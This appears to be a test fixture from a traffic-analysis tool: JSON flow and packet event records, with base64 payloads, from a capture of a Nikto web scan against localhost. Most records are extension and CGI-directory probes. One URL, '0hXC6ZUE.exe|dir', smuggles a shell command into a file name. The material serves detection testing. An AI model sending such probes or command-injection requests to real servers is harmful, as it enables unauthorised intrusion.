-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276685,"pkt":"AAAAAAAAAAAAAAAACABFAADE6exAAEAGUkV\/AAABfwAAAcGsH5Ci99H6PnUDOIAYAED+uAAAAQEICp1m+vWdZvr1R0VUIC8waFhDNlpVRS5jbWQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276686,"pkt":"AAAAAAAAAAAAAAAACABFAADEl0RAAEAGpO1\/AAABfwAAAcGuH5BUwq9SBePOj4AYAED+uAAAAQEICp1m+vadZvr2R0VUIC8waFhDNlpVRS5odG0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276687,"pkt":"AAAAAAAAAAAAAAAACABFAADFbA5AAEAG0CJ\/AAABfwAAAcGwH5CxUlQZUrozMIAYAED+uQAAAQEICp1m+vedZvr3R0VUIC8waFhDNlpVRS5odG1sIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276689,"pkt":"AAAAAAAAAAAAAAAACABFAADEYhpAAEAG2hd\/AAABfwAAAcGyH5BKOloN5Bjd7oAYAED+uAAAAQEICp1m+vmdZvr5R0VUIC8waFhDNlpVRS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276690,"pkt":"AAAAAAAAAAAAAAAACABFAADErQxAAEAGjyV\/AAABfwAAAcG0H5DNO5UfftfaRYAYAED+uAAAAQEICp1m+vqdZvr6R0VUIC8waFhDNlpVRS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276692,"pkt":"AAAAAAAAAAAAAAAACABFAADEWZ5AAEAG4pN\/AAABfwAAAcG2H5D\/SmGKHR\/Uy4AYAED+uAAAAQEICp1m+vydZvr7R0VUIC8waFhDNlpVRS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276694,"pkt":"AAAAAAAAAAAAAAAACABFAADIBvJAAEAGNTx\/AAABfwAAAcG4H5DthT7meWwMh4AYAED+vAAAAQEICp1m+v6dZvr9R0VUIC8waFhDNlpVRS5leGV8ZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276695,"pkt":"AAAAAAAAAAAAAAAACABFAADCG\/NAAEAGIEF\/AAABfwAAAcG6H5DzUiPolNWjYoAYAED+tgAAAQEICp1m+v+dZvr\/R0VUIC9pbmRleC5waHA\/IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276697,"pkt":"AAAAAAAAAAAAAAAACABFAADEgRRAAEAGux1\/AAABfwAAAcG8H5ABRrkFDdcmsoAYAED+uAAAAQEICp1m+wGdZvsBR0VUIC9jZ2kuY2dpLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276699,"pkt":"AAAAAAAAAAAAAAAACABFAADDtolAAEAGhal\/AAABfwAAAcG+H5DlK46S3uw4X4AYAED+twAAAQEICp1m+wKdZvsCR0VUIC93ZWJjZ2kvIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KDQo="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276701,"pkt":"AAAAAAAAAAAAAAAACABFAADEOWhAAEAGAsp\/AAABfwAAAcHAH5CIUQFyvT1whIAYAED+uAAAAQEICp1m+wWdZvsFR0VUIC9jZ2ktOTE0LyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
